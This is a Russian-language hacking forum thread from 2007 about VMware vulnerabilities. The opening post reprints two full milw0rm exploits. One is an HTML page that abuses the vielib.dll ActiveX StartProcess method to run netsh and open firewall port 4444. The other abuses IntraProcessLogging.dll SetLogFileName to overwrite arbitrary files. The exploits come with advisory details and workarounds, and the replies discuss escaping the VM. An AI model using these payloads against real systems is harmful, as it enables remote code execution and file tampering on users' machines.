Уязвимости в VmWare

Discussion in 'Мировые новости. Обсуждения.' started by Liar, 24 Sep 2007.

  1. Liar

    Liar Active Member

    Joined:
    17 May 2007
    Messages:
    191
    Likes Received:
    205
    Reputations:
    20
    Виртуальные машины используются в качустве полигона для для иследования вредоносных программ, создания гостевой оси для хак опытов каждый для себя найдёт сам применения . Но так же как и другое ПО они не лешены ошибок в коде и поэтому и поэтому представляют собой соблазнительную идею для атак.
    29 июля 2007 года хакер caLLAX из групы GOODFELLAS Security Research Team нашёл уязвимость в VmWare , он обнаружил что в состав VmWare входит любопытный ActiveX компонент, он реализован вдинамической библиотеке vielib.dll которая экспортирует потециально небезопасные методы.ОДним из таких методов является StartProcess позволяющий порождать процесы от имени текущего пользователя со всеми его привелегиями.
    подробнее можно прочитать на :
    http://www.securityfocus.com/bid/25118
    сам эксплоит:
    Code:
    :. GOODFELLAS Security Research TEAM  .:
    :. http://goodfellas.shellcode.com.ar .:
    
    vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit
    =============================================================================
    
    Internal ID: VULWAR200707290.
    -----------
    
    Introduction
    ------------
    vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.
    
    
    Tested In
    ---------
    - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
    
    
    Summary
    -------
    The StartProcess method doesn't check if it's being called from the application,
    or malicious users. Remote Attacker could craft a html page and execute code in
    a remote system with the actual user privileges.
    
    
    Impact
    ------
    Any computer that uses this Sofware will be exposed to Remote Execution Code.
    
    
    Workaround
    ----------
    - Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529
    - Unregister vielib.dll using regsvr32.
    
    
    Timeline
    --------
    July 29 2007 -- Bug Discovery.
    July 29 2007 -- Exploit published.
    
    
    Credits
    -------
     * callAX <[email protected]>
     * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
     
    
    Technical Details
    -----------------
    
    StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit
    is using three standard files that exists in every Microsoft Office 2003 Application.
    
    
    <HTML>
    <BODY>
      <object id=ctrl classid="clsid:{7B9C5422-39AA-4C21-BEEF-645E42EB4529}"></object>
    <SCRIPT>
    
    function Poc() {
     arg1 = "C:\\windows\\system32\\netsh.exe"
     arg2 = "C:\\windows\\system32\\netsh.exe firewall add portopening tcp 4444 GotIT"
     arg3 = "C:\\windows\\system32\\"
     arg4 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseneu.txt"
     arg5 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseeng.txt"
     arg6 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseenu.txt"
     arg7 = "1"
     ctrl.StartProcess(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7)
     }
    
    </SCRIPT>
    <input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
    </BODY>
    </HTML>
    
    # milw0rm.com [2007-07-29]
    http://milw0rm.com/exploits/4244
    так же 30июля 2007 года (на следующий день)
    этим же самым человеком была найдена ещё одна уязвимость в этой же библиотеке.
    Так же 28 июля той же групой была найдена уязвимость в VmWare позволяющая произвести перезапись произвольного кода
    Code:
    <!--
    ---------------------------------------------------------------------------
    
    :. GOODFELLAS Security Research TEAM  .:
    :. http://goodfellas.shellcode.com.ar .:
    
    IntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit
    ===========================================================================
    
    Internal ID: VULWAR200707280.
    -----------
    
    Introduction
    ------------
    IntraProcessLogging.dll is a library included in the Program Vmware from
    Vmware Inc. Company.
    
    
    Tested In
    ---------
    - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
    
    
    Summary
    -------
    The SetLogFileName method doesn't check if it's being called from the
    application,
    or malicious users. Remote Attacker could craft a html page and overwrite
    arbitrary
    files in a system.
    
    
    Impact
    ------
    Any computer that uses this Sofware will be exposed to Data Write Arbitrary.
    
    
    Workaround
    ----------
    - Activate the Kill bit zero in clsid:AF13B07E-28A1-4CAC-9C9A-EC582E354A24
    - Unregister IntraProcessLogging.dll using regsvr32.
    
    
    Timeline
    --------
    July 28 2007 -- Bug Discovery.
    July 28 2007 -- Exploit published.
    
    
    Credits
    -------
     * callAX <[email protected]>
     * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
    
    
    Technical Details
    -----------------
    
    SetLogFileName method receives one argument filename in this format
    "c:\path\file".
    
    
    Proof of Concept
    ---------------->
    
    <HTML>
    <BODY>
     <object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>
    
    <SCRIPT>
    
    function Do_it()
     {
       File = "c:\\arbitrary_file.txt"
       ctrl.SetLogFileName(File)
     }
    
    </SCRIPT>
    <input language=JavaScript onclick=Do_it() type=button value="Proof of
    Concept">
    </BODY>
    </HTML>
    
    # milw0rm.com [2007-07-28]
    http://milw0rm.com/exploits/4240

    и так в связи популяризации виртуальных машин начинаются оттачиваться новые технологии нападения и обороны на онные.

    навеяно журналом хакер за сентябрь (постараясь зделать скан статей с описанием данной уязвимости)
    Так же при поиске на http://milw0rm.com/search.php уязвимостей по запросу VmWare было показанно 5 уязвимостей что уже заставляет задуматься.

    2007-07-30 VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit 6925 R D X callAX

    2007-07-29 VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit 5887 R D X callAX
    2007-07-28 VMware IntraProcessLogging.dll 5.5.3.42958 Arbitrary Data Write Exploit 3726 R D X callAX
    2006-08-27 VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit 5491 R D c0ntex
    2006-08-16 VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit 3663 R D X nop
     
  2. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    Так уязвимость вроде как выполняется внутри vmware на которую поставлена винда, а не в самой реальной системе?..
    И как тут же написано "создания гостевой оси для хак опытов". У меня на vmware рассадник троянов и вирусов, да и друзья заходят через radmin поприкалыватся. Так-что каких-то там уязвимостей внутри vmware бояться... Это странно :)
    Если конечно vmware не использовать для vps.
     
  3. Liar

    Liar Active Member

    Joined:
    17 May 2007
    Messages:
    191
    Likes Received:
    205
    Reputations:
    20
    Ошибка имевшая место в 2005 году

    А вот здесь ты не прав так как уязвимость в vmnat.ехе входящей в состав VMWare Workstation 5.5.0 приводила к тому что при вызывания переполнения динамической памяти возможна была засылка кода на основную ось со всеми вытикающими из этого последствиями.
    более подробно можно почитать в архиве с сканом журнала
    http://slil.ru/24894467
     
  4. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,191
    Reputations:
    430
    В Хакере каком-то писали, что есть там уязвимость какая-то, использование, которой, позволяет "выйти за границы вээмваре"(номера 55-70 примерно)
     
  5. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    статья Криса?
     
  6. Liar

    Liar Active Member

    Joined:
    17 May 2007
    Messages:
    191
    Likes Received:
    205
    Reputations:
    20
    #6 Liar, 24 Sep 2007
    Last edited: 24 Sep 2007
  7. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    Да Крис писал, 87 номер. Старая статья уже.
     
  8. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    старая, но интересная)
     
  9. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    В тот период было гораздо больше интересных статей чем сейчас=(
     
Loading...